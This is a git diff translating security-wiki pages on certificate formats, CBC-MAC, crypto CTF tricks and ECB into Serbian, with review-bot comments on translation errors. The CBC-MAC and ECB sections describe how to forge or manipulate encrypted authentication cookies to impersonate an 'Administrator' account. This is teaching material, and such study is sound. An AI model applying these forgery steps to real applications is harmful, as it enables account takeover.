kompatibilnošću. Ovaj pregled pokriva glavne formate i pruža smernice za konvertovanje između njih. -Different formats exist for storing certificates, each with its own use cases and compatibility. This summary covers the main formats and provides guidance on converting between them. 
+## **Formati** -## **Formats** +### **PEM format** -### **PEM Format** +- Najšire korišćen format za sertifikate. +- Zahteva odvojene fajlove za sertifikate i privatne ključeve, kodirane u Base64 ASCII. +- Uobičajene ekstenzije: .cer, .crt, .pem, .key. +- Primarno koriste Apache i slični serveri. -- Most widely used format for certificates. -- Requires separate files for certificates and private keys, encoded in Base64 ASCII. -- Common extensions: .cer, .crt, .pem, .key. -- Primarily used by Apache and similar servers. +### **DER format** -### **DER Format** +- Binarni format sertifikata. +- Nedostaju "BEGIN/END CERTIFICATE" izjave koje se nalaze u PEM fajlovima. +- Uobičajene ekstenzije: .cer, .der. +- Često se koristi sa Java platformama. -- A binary format of certificates. -- Lacks the "BEGIN/END CERTIFICATE" statements found in PEM files. -- Common extensions: .cer, .der. -- Often used with Java platforms. +### **P7B/PKCS#7 format** -### **P7B/PKCS#7 Format** +- Skladišti se u Base64 ASCII, sa ekstenzijama .p7b ili .p7c. +- Sadrži samo sertifikate i lance sertifikata, isključujući privatni ključ. +- Podržava Microsoft Windows i Java Tomcat. -- Stored in Base64 ASCII, with extensions .p7b or .p7c. -- Contains only certificates and chain certificates, excluding the private key. -- Supported by Microsoft Windows and Java Tomcat. +### **PFX/P12/PKCS#12 format** -### **PFX/P12/PKCS#12 Format** +- Binarni format koji enkapsulira server sertifikate, međusertifikate i privatne ključeve u jednom fajlu. +- Ekstenzije: .pfx, .p12. +- Uglavnom se koristi na Windows-u za uvoz i izvoz sertifikata. -- A binary format that encapsulates server certificates, intermediate certificates, and private keys in one file. -- Extensions: .pfx, .p12. -- Mainly used on Windows for certificate import and export. 
+### **Konvertovanje formata** -### **Converting Formats** - -**PEM conversions** are essential for compatibility: +**PEM konverzije** su neophodne za kompatibilnost: - **x509 to PEM** - ```bash openssl x509 -in certificatename.cer -outform PEM -out certificatename.pem ``` - -- **PEM to DER** - +- **PEM u DER** ```bash openssl x509 -outform der -in certificatename.pem -out certificatename.der ``` - -- **DER to PEM** - +- **DER u PEM** ```bash openssl x509 -inform der -in certificatename.der -out certificatename.pem ``` - -- **PEM to P7B** - +- **PEM u P7B** ```bash openssl crl2pkcs7 -nocrl -certfile certificatename.pem -out certificatename.p7b -certfile CACert.cer ``` - -- **PKCS7 to PEM** - +- **PKCS7 u PEM** ```bash openssl pkcs7 -print_certs -in certificatename.p7b -out certificatename.pem ``` +**PFX konverzije** su ključne za upravljanje sertifikatima na Windows-u: -**PFX conversions** are crucial for managing certificates on Windows: - -- **PFX to PEM** - +- **PFX u PEM** ```bash openssl pkcs12 -in certificatename.pfx -out certificatename.pem ``` - -- **PFX to PKCS#8** involves two steps: - 1. Convert PFX to PEM - +- **PFX to PKCS#8** uključuje dva koraka: +1. Konvertujte PFX u PEM ```bash openssl pkcs12 -in certificatename.pfx -nocerts -nodes -out certificatename.pem ``` - -2. Convert PEM to PKCS8 - +2. Konvertujte PEM u PKCS8 ```bash openSSL pkcs8 -in certificatename.pem -topk8 -nocrypt -out certificatename.pk8 ``` - -- **P7B to PFX** also requires two commands: - 1. Convert P7B to CER - +- **P7B to PFX** takođe zahteva dve komande: +1. Konvertujte P7B u CER ```bash openssl pkcs7 -print_certs -in certificatename.p7b -out certificatename.cer ``` - -2. Convert CER and Private Key to PFX - +2. Konvertujte CER i privatni ključ u PFX ```bash openssl pkcs12 -export -in certificatename.cer -inkey privateKey.key -out certificatename.pfx -certfile cacert.cer ``` - ---- - -
- -\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} +--- {{#include ../banners/hacktricks-training.md}} diff --git a/src/cryptography/cipher-block-chaining-cbc-mac-priv.md b/src/cryptography/cipher-block-chaining-cbc-mac-priv.md index 47f1b2713..dde21fdf5 100644 --- a/src/cryptography/cipher-block-chaining-cbc-mac-priv.md +++ b/src/cryptography/cipher-block-chaining-cbc-mac-priv.md 
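Review bot: In the certificates page hunk `@@ -63,133 +54,104 @@`, `Podržava Microsoft Windows i Java Tomcat` under P7B/PKCS#7 inverts the original `Supported by Microsoft Windows and Java Tomcat` (it now says the format supports those platforms); write `Podržavaju ga Microsoft Windows i Java Tomcat`. `proverili da li je digitalni javni ključ sertifikat opozvan` should be `da li je sertifikat javnog ključa opozvan`, and `Sertifikati logovi` should be `Logovi sertifikata`. The conversion headings are half translated: `**x509 to PEM**`, `**PFX to PKCS#8**` and `**P7B to PFX**` keep the English `to` while the neighbours use `u`; pick one. While here, the unchanged context line `openSSL pkcs8 -in certificatename.pem -topk8 -nocrypt -out certificatename.pk8` will not run on a case-sensitive system, the binary is `openssl`. Finally, this hunk deletes the blank line between each bullet and its fence (`- -- **PEM to DER** - +- **PEM u DER** ```bash`); keep those blank lines so the bullet lists render as they did before.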
@@ -2,54 +2,54 @@ # CBC -If the **cookie** is **only** the **username** (or the first part of the cookie is the username) and you want to impersonate the username "**admin**". Then, you can create the username **"bdmin"** and **bruteforce** the **first byte** of the cookie. +Ako je **kolačić** **samo** **korisničko ime** (ili je prva deo kolačića korisničko ime) i želite da se pretvarate da ste korisnik "**admin**". Tada možete kreirati korisničko ime **"bdmin"** i **bruteforce**-ovati **prvi bajt** kolačića. # CBC-MAC -**Cipher block chaining message authentication code** (**CBC-MAC**) is a method used in cryptography. It works by taking a message and encrypting it block by block, where each block's encryption is linked to the one before it. This process creates a **chain of blocks**, making sure that changing even a single bit of the original message will lead to an unpredictable change in the last block of encrypted data. To make or reverse such a change, the encryption key is required, ensuring security. +**Cipher block chaining message authentication code** (**CBC-MAC**) je metoda koja se koristi u kriptografiji. Funkcioniše tako što uzima poruku i šifruje je blok po blok, pri čemu je šifrovanje svakog bloka povezano sa prethodnim. Ovaj proces stvara **lanac blokova**, osiguravajući da će promena čak i jednog bita originalne poruke dovesti do nepredvidive promene u poslednjem bloku šifrovanih podataka. Da bi se izvršila ili obrnula takva promena, potrebna je šifrovana ključeva, čime se osigurava bezbednost. -To calculate the CBC-MAC of message m, one encrypts m in CBC mode with zero initialization vector and keeps the last block. 
The following figure sketches the computation of the CBC-MAC of a message comprising blocks![https://wikimedia.org/api/rest_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5](https://wikimedia.org/api/rest_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5) using a secret key k and a block cipher E: +Da bi se izračunao CBC-MAC poruke m, šifruje se m u CBC režimu sa nultim inicijalizacionim vektorom i čuva se poslednji blok. Sledeća slika prikazuje izračunavanje CBC-MAC-a poruke koja se sastoji od blokova![https://wikimedia.org/api/rest_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5](https://wikimedia.org/api/rest_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5) koristeći tajni ključ k i blok šifru E: ![https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC_structure_(en).svg/570px-CBC-MAC_structure_(en).svg.png]() -# Vulnerability +# Ranljivost -With CBC-MAC usually the **IV used is 0**.\ -This is a problem because 2 known messages (`m1` and `m2`) independently will generate 2 signatures (`s1` and `s2`). So: +Sa CBC-MAC obično je **IV koji se koristi 0**.\ +To je problem jer 2 poznate poruke (`m1` i `m2`) nezavisno će generisati 2 potpisa (`s1` i `s2`). 
Tako: - `E(m1 XOR 0) = s1` - `E(m2 XOR 0) = s2` -Then a message composed by m1 and m2 concatenated (m3) will generate 2 signatures (s31 and s32): +Tada poruka sastavljena od m1 i m2 konkateniranih (m3) će generisati 2 potpisa (s31 i s32): - `E(m1 XOR 0) = s31 = s1` - `E(m2 XOR s1) = s32` -**Which is possible to calculate without knowing the key of the encryption.** +**Što je moguće izračunati bez poznavanja ključa šifrovanja.** -Imagine you are encrypting the name **Administrator** in **8bytes** blocks: +Zamislite da šifrujete ime **Administrator** u **8 bajtnih** blokova: - `Administ` - `rator\00\00\00` -You can create a username called **Administ** (m1) and retrieve the signature (s1).\ -Then, you can create a username called the result of `rator\00\00\00 XOR s1`. This will generate `E(m2 XOR s1 XOR 0)` which is s32.\ -now, you can use s32 as the signature of the full name **Administrator**. +Možete kreirati korisničko ime pod nazivom **Administ** (m1) i dobiti potpis (s1).\ +Zatim, možete kreirati korisničko ime koje je rezultat `rator\00\00\00 XOR s1`. Ovo će generisati `E(m2 XOR s1 XOR 0)` što je s32.\ +sada, možete koristiti s32 kao potpis punog imena **Administrator**. -### Summary +### Sažetak -1. Get the signature of username **Administ** (m1) which is s1 -2. Get the signature of username **rator\x00\x00\x00 XOR s1 XOR 0** is s32**.** -3. Set the cookie to s32 and it will be a valid cookie for the user **Administrator**. +1. Dobijte potpis korisničkog imena **Administ** (m1) koji je s1 +2. Dobijte potpis korisničkog imena **rator\x00\x00\x00 XOR s1 XOR 0** je s32**.** +3. Postavite kolačić na s32 i biće to validan kolačić za korisnika **Administrator**. 
-# Attack Controlling IV +# Napad Kontrolisanjem IV -If you can control the used IV the attack could be very easy.\ -If the cookies is just the username encrypted, to impersonate the user "**administrator**" you can create the user "**Administrator**" and you will get it's cookie.\ -Now, if you can control the IV, you can change the first Byte of the IV so **IV\[0] XOR "A" == IV'\[0] XOR "a"** and regenerate the cookie for the user **Administrator.** This cookie will be valid to **impersonate** the user **administrator** with the initial **IV**. +Ako možete kontrolisati korišćeni IV, napad bi mogao biti vrlo lak.\ +Ako je kolačić samo korisničko ime šifrovano, da biste se pretvarali da ste korisnik "**administrator**" možete kreirati korisnika "**Administrator**" i dobićete njegov kolačić.\ +Sada, ako možete kontrolisati IV, možete promeniti prvi bajt IV-a tako da **IV\[0] XOR "A" == IV'\[0] XOR "a"** i regenerisati kolačić za korisnika **Administrator.** Ovaj kolačić će biti validan za **pretvaranje** korisnika **administrator** sa inicijalnim **IV**. -## References +## Reference -More information in [https://en.wikipedia.org/wiki/CBC-MAC](https://en.wikipedia.org/wiki/CBC-MAC) +Više informacija na [https://en.wikipedia.org/wiki/CBC-MAC](https://en.wikipedia.org/wiki/CBC-MAC) {{#include ../banners/hacktricks-training.md}} diff --git a/src/cryptography/crypto-ctfs-tricks.md b/src/cryptography/crypto-ctfs-tricks.md index bb2b5f049..3cc84b024 100644 --- a/src/cryptography/crypto-ctfs-tricks.md +++ b/src/cryptography/crypto-ctfs-tricks.md @@ -25,7 +25,7 @@ ## Encoders -Most of encoded data can be decoded with these 2 ressources: +Većina kodiranih podataka može se dekodirati pomoću ova 2 resursa: - [https://www.dcode.fr/tools-list](https://www.dcode.fr/tools-list) - [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) 
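Review bot: In `cipher-block-chaining-cbc-mac-priv.md`, `potrebna je šifrovana ključeva` is ungrammatical and loses the meaning of `the encryption key is required`; write `potreban je ključ za šifrovanje`. Also `# Ranljivost` should be `# Ranjivost`, `prva deo kolačića` should be `prvi deo kolačića`, and `validan za **pretvaranje** korisnika **administrator**` reads as "pretending the user"; the sense is impersonation, so `validan za lažno predstavljanje kao korisnik administrator`. Step 2 of the summary, `Dobijte potpis korisničkog imena **rator\x00\x00\x00 XOR s1 XOR 0** je s32`, carries over the original's dangling `is s32`; `... koji je s32` matches the form of step 1.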
@@ -33,7 +33,7 @@ Most of encoded data can be decoded with these 2 ressources: ### Substitution Autosolvers - [https://www.boxentriq.com/code-breaking/cryptogram](https://www.boxentriq.com/code-breaking/cryptogram) -- [https://quipqiup.com/](https://quipqiup.com) - Very good ! +- [https://quipqiup.com/](https://quipqiup.com) - Veoma dobro! #### Caesar - ROTx Autosolvers 
@@ -45,95 +45,90 @@ Most of encoded data can be decoded with these 2 ressources: ### Base Encodings Autosolver -Check all these bases with: [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext) +Proverite sve ove baze sa: [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext) - **Ascii85** - - `BQ%]q@psCd@rH0l` +- `BQ%]q@psCd@rH0l` - **Base26** \[_A-Z_] - - `BQEKGAHRJKHQMVZGKUXNT` +- `BQEKGAHRJKHQMVZGKUXNT` - **Base32** \[_A-Z2-7=_] - - `NBXWYYLDMFZGCY3PNRQQ====` +- `NBXWYYLDMFZGCY3PNRQQ====` - **Zbase32** \[_ybndrfg8ejkmcpqxot1uwisza345h769_] - - `pbzsaamdcf3gna5xptoo====` +- `pbzsaamdcf3gna5xptoo====` - **Base32 Geohash** \[_0-9b-hjkmnp-z_] - - `e1rqssc3d5t62svgejhh====` +- `e1rqssc3d5t62svgejhh====` - **Base32 Crockford** \[_0-9A-HJKMNP-TV-Z_] - - `D1QPRRB3C5S62RVFDHGG====` +- `D1QPRRB3C5S62RVFDHGG====` - **Base32 Extended Hexadecimal** \[_0-9A-V_] - - `D1NMOOB3C5P62ORFDHGG====` +- `D1NMOOB3C5P62ORFDHGG====` - **Base45** \[_0-9A-Z $%\*+-./:_] - - `59DPVDGPCVKEUPCPVD` +- `59DPVDGPCVKEUPCPVD` - **Base58 (bitcoin)** \[_1-9A-HJ-NP-Za-km-z_] - - `2yJiRg5BF9gmsU6AC` +- `2yJiRg5BF9gmsU6AC` - **Base58 (flickr)** \[_1-9a-km-zA-HJ-NP-Z_] - - `2YiHqF5bf9FLSt6ac` +- `2YiHqF5bf9FLSt6ac` - **Base58 (ripple)** \[_rpshnaf39wBUDNEGHJKLM4PQ-T7V-Z2b-eCg65jkm8oFqi1tuvAxyz_] - - `pyJ5RgnBE9gm17awU` +- `pyJ5RgnBE9gm17awU` - **Base62** \[_0-9A-Za-z_] - - `g2AextRZpBKRBzQ9` +- `g2AextRZpBKRBzQ9` - **Base64** \[_A-Za-z0-9+/=_] - - `aG9sYWNhcmFjb2xh` +- `aG9sYWNhcmFjb2xh` - **Base67** \[_A-Za-z0-9-_.!\~\_] - - `NI9JKX0cSUdqhr!p` +- `NI9JKX0cSUdqhr!p` - **Base85 (Ascii85)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_] - - `BQ%]q@psCd@rH0l` +- `BQ%]q@psCd@rH0l` - **Base85 (Adobe)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_] - - `<~BQ%]q@psCd@rH0l~>` +- `<~BQ%]q@psCd@rH0l~>` - **Base85 (IPv6 or RFC1924)** \[_0-9A-Za-z!#$%&()\*+-;<=>?@^_\`{|}\~\_] - - `Xm4y`V\_|Y(V{dF>\` +- `Xm4y`V\_|Y(V{dF>\` - **Base85 (xbtoa)** 
\[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_] - - `xbtoa Begin\nBQ%]q@psCd@rH0l\nxbtoa End N 12 c E 1a S 4e6 R 6991d` +- `xbtoa Begin\nBQ%]q@psCd@rH0l\nxbtoa End N 12 c E 1a S 4e6 R 6991d` - **Base85 (XML)** \[\_0-9A-Za-y!#$()\*+,-./:;=?@^\`{|}\~z\_\_] - - `Xm4y|V{~Y+V}dF?` +- `Xm4y|V{~Y+V}dF?` - **Base91** \[_A-Za-z0-9!#$%&()\*+,./:;<=>?@\[]^\_\`{|}\~"_] - - `frDg[*jNN!7&BQM` +- `frDg[*jNN!7&BQM` - **Base100** \[] - - `👟👦👣👘👚👘👩👘👚👦👣👘` +- `👟👦👣👘👚👘👩👘👚👦👣👘` - **Base122** \[] - - `4F ˂r0Xmvc` +- `4F ˂r0Xmvc` - **ATOM-128** \[_/128GhIoPQROSTeUbADfgHijKLM+n0pFWXY456xyzB7=39VaqrstJklmNuZvwcdEC_] - - `MIc3KiXa+Ihz+lrXMIc3KbCC` +- `MIc3KiXa+Ihz+lrXMIc3KbCC` - **HAZZ15** \[_HNO4klm6ij9n+J2hyf0gzA8uvwDEq3X1Q7ZKeFrWcVTts/MRGYbdxSo=ILaUpPBC5_] - - `DmPsv8J7qrlKEoY7` +- `DmPsv8J7qrlKEoY7` - **MEGAN35** \[_3G-Ub=c-pW-Z/12+406-9Vaq-zA-F5_] - - `kLD8iwKsigSalLJ5` +- `kLD8iwKsigSalLJ5` - **ZONG22** \[_ZKj9n+yf0wDVX1s/5YbdxSo=ILaUpPBCHg8uvNO4klm6iJGhQ7eFrWczAMEq3RTt2_] - - `ayRiIo1gpO+uUc7g` +- `ayRiIo1gpO+uUc7g` - **ESAB46** \[] - - `3sHcL2NR8WrT7mhR` +- `3sHcL2NR8WrT7mhR` - **MEGAN45** \[] - - `kLD8igSXm2KZlwrX` +- `kLD8igSXm2KZlwrX` - **TIGO3FX** \[] - - `7AP9mIzdmltYmIP9mWXX` +- `7AP9mIzdmltYmIP9mWXX` - **TRIPO5** \[] - - `UE9vSbnBW6psVzxB` +- `UE9vSbnBW6psVzxB` - **FERON74** \[] - - `PbGkNudxCzaKBm0x` +- `PbGkNudxCzaKBm0x` - **GILA7** \[] - - `D+nkv8C1qIKMErY1` +- `D+nkv8C1qIKMErY1` - **Citrix CTX1** \[] - - `MNGIKCAHMOGLKPAKMMGJKNAINPHKLOBLNNHILCBHNOHLLPBK` +- `MNGIKCAHMOGLKPAKMMGJKNAINPHKLOBLNNHILCBHNOHLLPBK` [http://k4.cba.pl/dw/crypo/tools/eng_atom128c.html](http://k4.cba.pl/dw/crypo/tools/eng_atom128c.html) - 404 Dead: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html) ### HackerizeXS \[_╫Λ↻├☰┏_] - ``` ╫☐↑Λ↻Λ┏Λ↻☐↑Λ ``` - -- [http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html](http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html) - 404 
Dead: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html) +- [http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html](http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html) - 404 Mrtav: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng_hackerize.html) ### Morse - ``` .... --- .-.. -.-. .- .-. .- -.-. --- .-.. .- ``` - -- [http://k4.cba.pl/dw/crypo/tools/eng_morse-encode.html](http://k4.cba.pl/dw/crypo/tools/eng_morse-encode.html) - 404 Dead: [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) +- [http://k4.cba.pl/dw/crypo/tools/eng_morse-encode.html](http://k4.cba.pl/dw/crypo/tools/eng_morse-encode.html) - 404 Mrtav: [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) ### UUencoder - ``` begin 644 webutils_pl M2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%( 
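Review bot: The `@@ -45,95 +45,90 @@` hunk flattens the base-encoding list: every sample string was a nested item (`-  - \`BQ%]q@psCd@rH0l\``) and is now a top-level bullet (`+- \`BQ%]q@psCd@rH0l\``). With some thirty encodings the rendered list alternates name and sample at the same level, so a reader can no longer see which sample belongs to which alphabet; keep the two-space indent so each sample stays under its encoding. The same hunk also drops the blank line before the `### HackerizeXS` and `### Morse` link lines and before each fence; keep those so the layout matches the surrounding pages.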
@@ -142,98 +137,81 @@ F3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$$` ` end ``` - - [http://www.webutils.pl/index.php?idx=uu](http://www.webutils.pl/index.php?idx=uu) ### XXEncoder - ``` begin 644 webutils_pl hG2xAEIVDH236Hol-G2xAEIVDH236Hol-G2xAEIVDH236Hol-G2xAEIVDH236 5Hol-G2xAEE++ end ``` - - [www.webutils.pl/index.php?idx=xx](https://github.com/carlospolop/hacktricks/tree/bf578e4c5a955b4f6cdbe67eb4a543e16a3f848d/crypto/www.webutils.pl/index.php?idx=xx) ### YEncoder - ``` =ybegin line=128 size=28 name=webutils_pl ryvkryvkryvkryvkryvkryvkryvk =yend size=28 crc32=35834c86 ``` - - [http://www.webutils.pl/index.php?idx=yenc](http://www.webutils.pl/index.php?idx=yenc) ### BinHex - ``` (This file must be converted with BinHex 4.0) :#hGPBR9dD@acAh"X!$mr2cmr2cmr!!!!!!!8!!!!!-ka5%p-38K26%&)6da"5%p -38K26%'d9J!!: ``` - - [http://www.webutils.pl/index.php?idx=binhex](http://www.webutils.pl/index.php?idx=binhex) ### ASCII85 - ``` <~85DoF85DoF85DoF85DoF85DoF85DoF~> ``` - - [http://www.webutils.pl/index.php?idx=ascii85](http://www.webutils.pl/index.php?idx=ascii85) -### Dvorak keyboard - +### Dvorak tastatura ``` drnajapajrna ``` - - [https://www.geocachingtoolbox.com/index.php?lang=en\&page=dvorakKeyboard](https://www.geocachingtoolbox.com/index.php?lang=en&page=dvorakKeyboard) ### A1Z26 -Letters to their numerical value - +Slova do njihove numeričke vrednosti ``` 8 15 12 1 3 1 18 1 3 15 12 1 ``` - ### Affine Cipher Encode -Letter to num `(ax+b)%26` (_a_ and _b_ are the keys and _x_ is the letter) and the result back to letter - +Pismo u broj `(ax+b)%26` (_a_ i _b_ su ključevi, a _x_ je slovo) i rezultat nazad u slovo ``` krodfdudfrod ``` +### SMS Kod -### SMS Code +**Multitap** [menja slovo](https://www.dcode.fr/word-letter-change) ponovljenim ciframa definisanim odgovarajućim kodom tastera na mobilnom [tastaturi](https://www.dcode.fr/phone-keypad-cipher) (Ovaj način se koristi prilikom pisanja SMS-a).\ +Na primer: 2=A, 22=B, 222=C, 3=D...\ +Možete identifikovati ovaj 
kod jer ćete videti\*\* nekoliko ponovljenih brojeva\*\*. -**Multitap** [replaces a letter](https://www.dcode.fr/word-letter-change) by repeated digits defined by the corresponding key code on a mobile [phone keypad](https://www.dcode.fr/phone-keypad-cipher) (This mode is used when writing SMS).\ -For example: 2=A, 22=B, 222=C, 3=D...\ -You can identify this code because you will see\*\* several numbers repeated\*\*. +Možete dekodirati ovaj kod na: [https://www.dcode.fr/multitap-abc-cipher](https://www.dcode.fr/multitap-abc-cipher) -You can decode this code in: [https://www.dcode.fr/multitap-abc-cipher](https://www.dcode.fr/multitap-abc-cipher) - -### Bacon Code - -Substitude each letter for 4 As or Bs (or 1s and 0s) +### Bacon Kod +Zamenite svako slovo sa 4 A ili B (ili 1 i 0) ``` 00111 01101 01010 00000 00010 00000 10000 00000 00010 01101 01010 00000 AABBB ABBAB ABABA AAAAA AAABA AAAAA BAAAA AAAAA AAABA ABBAB ABABA AAAAA ``` - ### Runes ![](../images/runes.jpg) -## Compression +## Kompresija -**Raw Deflate** and **Raw Inflate** (you can find both in Cyberchef) can compress and decompress data without headers. +**Raw Deflate** i **Raw Inflate** (možete ih pronaći u Cyberchef-u) mogu kompresovati i dekompresovati podatke bez zaglavlja. -## Easy Crypto +## Laka Kriptografija ### XOR - Autosolver 
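Review bot: Two glosses in the `@@ -142,98 +137,81 @@` hunk mistranslate the cipher descriptions: `Slova do njihove numeričke vrednosti` (A1Z26) says "letters up to their numeric value", the sense is `Slova u njihovu numeričku vrednost`; and `Pismo u broj` (Affine) uses `pismo` (a mailed letter, or a script) instead of `slovo`, so write `Slovo u broj`. In the SMS paragraph `videti\*\* nekoliko ponovljenih brojeva\*\*` keeps the escaped asterisks from the source, so literal `**` renders instead of bold; since the source line is being rewritten anyway, drop the backslashes and put the `**` on the word boundaries.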
@@ -241,30 +219,25 @@ AABBB ABBAB ABABA AAAAA AAABA AAAAA BAAAA AAAAA AAABA ABBAB ABABA AAAAA ### Bifid -A keywork is needed - +Potrebna je ključna reč ``` fgaargaamnlunesuneoa ``` - ### Vigenere -A keywork is needed - +Potreban je ključ. ``` wodsyoidrods ``` - - [https://www.guballa.de/vigenere-solver](https://www.guballa.de/vigenere-solver) - [https://www.dcode.fr/vigenere-cipher](https://www.dcode.fr/vigenere-cipher) - [https://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx](https://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx) -## Strong Crypto +## Snažna Kriptografija ### Fernet -2 base64 strings (token and key) - +2 base64 stringa (token i ključ) ``` Token: gAAAAABWC9P7-9RsxTz_dwxh9-O2VUB7Ih8UCQL1_Zk4suxnkCvb26Ie4i8HSUJ4caHZuiNtjLl3qfmCv_fS3_VpjL7HxCz7_Q== @@ -272,19 +245,16 @@ gAAAAABWC9P7-9RsxTz_dwxh9-O2VUB7Ih8UCQL1_Zk4suxnkCvb26Ie4i8HSUJ4caHZuiNtjLl3qfmC Key: -s6eI5hyNh8liH7Gq0urPC-vzPgNnxauKvRO4g03oYI= ``` - - [https://asecuritysite.com/encryption/ferdecode](https://asecuritysite.com/encryption/ferdecode) ### Samir Secret Sharing -A secret is splitted in X parts and to recover it you need Y parts (_Y <=X_). - +Tajna se deli na X delova i da biste je povratili, potrebna su vam Y dela (_Y <=X_). ``` 8019f8fa5879aa3e07858d08308dc1a8b45 80223035713295bddf0b0bd1b10a5340b89 803bc8cf294b3f83d88e86d9818792e80cd ``` - [http://christian.gen.co/secrets/](http://christian.gen.co/secrets/) ### OpenSSL brute-force @@ -292,7 +262,7 @@ A secret is splitted in X parts and to recover it you need Y parts (_Y <=X_). - [https://github.com/glv2/bruteforce-salted-openssl](https://github.com/glv2/bruteforce-salted-openssl) - [https://github.com/carlospolop/easy_BFopensslCTF](https://github.com/carlospolop/easy_BFopensslCTF) -## Tools +## Alati - [https://github.com/Ganapati/RsaCtfTool](https://github.com/Ganapati/RsaCtfTool) - [https://github.com/lockedbyte/cryptovenom](https://github.com/lockedbyte/cryptovenom) 
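Review bot: `A keywork is needed` is translated two different ways a few lines apart, `Potrebna je ključna reč` (Bifid) and `Potreban je ključ.` (Vigenere); both ciphers take a keyword, so use the same phrase for both. In the secret-sharing paragraph `potrebna su vam Y dela` should be `potrebno vam je Y delova`. While here, the unchanged heading `### Samir Secret Sharing` misspells Shamir; fix it in the same pass.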
diff --git a/src/cryptography/electronic-code-book-ecb.md b/src/cryptography/electronic-code-book-ecb.md index a09798b1e..f81eb0814 100644 --- a/src/cryptography/electronic-code-book-ecb.md +++ b/src/cryptography/electronic-code-book-ecb.md 
@@ -2,72 +2,66 @@ # ECB -(ECB) Electronic Code Book - symmetric encryption scheme which **replaces each block of the clear text** by the **block of ciphertext**. It is the **simplest** encryption scheme. The main idea is to **split** the clear text into **blocks of N bits** (depends on the size of the block of input data, encryption algorithm) and then to encrypt (decrypt) each block of clear text using the only key. +(ECB) Elektronska knjiga kodova - simetrična šema enkripcije koja **menja svaki blok otvorenog teksta** sa **blokom šifrovanog teksta**. To je **najjednostavnija** šema enkripcije. Glavna ideja je da se **podeli** otvoreni tekst na **blokove od N bita** (zavisi od veličine bloka ulaznih podataka, algoritma enkripcije) i zatim da se enkriptuje (dekriptuje) svaki blok otvorenog teksta koristeći jedini ključ. ![](https://upload.wikimedia.org/wikipedia/commons/thumb/e/e6/ECB_decryption.svg/601px-ECB_decryption.svg.png) -Using ECB has multiple security implications: +Korišćenje ECB ima više bezbednosnih implikacija: -- **Blocks from encrypted message can be removed** -- **Blocks from encrypted message can be moved around** +- **Blokovi iz šifrovane poruke mogu biti uklonjeni** +- **Blokovi iz šifrovane poruke mogu biti pomerani** -# Detection of the vulnerability +# Otkrivanje ranjivosti -Imagine you login into an application several times and you **always get the same cookie**. This is because the cookie of the application is **`|`**.\ -Then, you generate to new users, both of them with the **same long password** and **almost** the **same** **username**.\ -You find out that the **blocks of 8B** where the **info of both users** is the same are **equals**. Then, you imagine that this might be because **ECB is being used**. - -Like in the following example. Observe how these** 2 decoded cookies** has several times the block **`\x23U\xE45K\xCB\x21\xC8`** +Zamislite da se prijavljujete u aplikaciju nekoliko puta i **uvek dobijate isti kolačić**. 
To je zato što je kolačić aplikacije **`|`**.\ +Zatim, generišete nove korisnike, oboje sa **istim dugim lozinkama** i **gotovo** **istim** **korisničkim imenima**.\ +Otkrivate da su **blokovi od 8B** gde su **informacije obojice korisnika** iste **jednaki**. Tada zamišljate da bi to moglo biti zato što se **koristi ECB**. +Kao u sledećem primeru. Posmatrajte kako ova **2 dekodirana kolačića** imaju nekoliko puta blok **`\x23U\xE45K\xCB\x21\xC8`**. ``` \x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8\x04\xB6\xE1H\xD1\x1E \xB6\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8+=\xD4F\xF7\x99\xD9\xA9 \x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8\x04\xB6\xE1H\xD1\x1E \xB6\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8+=\xD4F\xF7\x99\xD9\xA9 ``` +Ovo je zato što **korisničko ime i lozinka tih kolačića sadrže nekoliko puta slovo "a"** (na primer). **Blokovi** koji su **različiti** su blokovi koji sadrže **barem 1 različit karakter** (možda delimiter "|" ili neka neophodna razlika u korisničkom imenu). -This is because the **username and password of those cookies contained several times the letter "a"** (for example). The **blocks** that are **different** are blocks that contained **at least 1 different character** (maybe the delimiter "|" or some necessary difference in the username). +Sada, napadaču je potrebno samo da otkrije da li je format `` ili ``. Da bi to uradio, može jednostavno **generisati nekoliko korisničkih imena** sa **sličnim i dugim korisničkim imenima i lozinkama dok ne pronađe format i dužinu delimitera:** -Now, the attacker just need to discover if the format is 